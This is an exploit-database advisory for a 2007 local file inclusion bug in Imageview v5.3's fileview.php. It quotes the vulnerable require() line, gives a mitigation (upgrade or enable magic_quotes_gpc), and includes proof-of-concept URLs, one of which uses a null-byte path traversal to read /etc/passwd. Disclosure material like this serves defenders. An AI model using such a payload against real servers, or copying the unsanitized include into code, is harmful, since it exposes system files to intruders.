Imageview v5.3 (fileview.php) Local File Inclusion

vendor:

Imageview

by:

DNX

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Imageview

Affected Version From: Imageview v5.3

Affected Version To: Imageview v5.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Imageview v5.3 (fileview.php) Local File Inclusion

The vulnerability exists in the fileview.php script of Imageview v5.3. It can be exploited when the magic_quotes_gpc setting is turned off. The issue is caused by not properly sanitizing the user-supplied input in the 'album' parameter, which is used in the require() function. An attacker can exploit this vulnerability to include arbitrary local files and potentially execute malicious code.

Mitigation:

To mitigate this vulnerability, users are advised to install Imageview version 6 or enable the magic_quotes_gpc setting.

Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   | Imageview v5.3 (fileview.php) Local File Inclusion |
   |      (works only with magic_quotes_gpc = off)      |
   |                    coded by DNX                    |
   ------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.blackdot.be/?inc=projects/imageview
[!] Detected: 21.04.2007
[!] Reported: 21.04.2007
[!] Remote: yes

[!] Background: Imageview is an image gallery script based on PHP

[!] Bug: $_GET['album'] in fileview.php line 4

         require('albums/'.$_GET['album'].'/data.dat');

[!] PoC:
    - http://[site]/[path]/fileview.php?album=[file]%00
    - http://[site]/[path]/fileview.php?album=../../../../../../etc/passwd%00

[!] Solution: Install Imageview 6 or magic_quotes_gpc = on

# milw0rm.com [2007-04-29]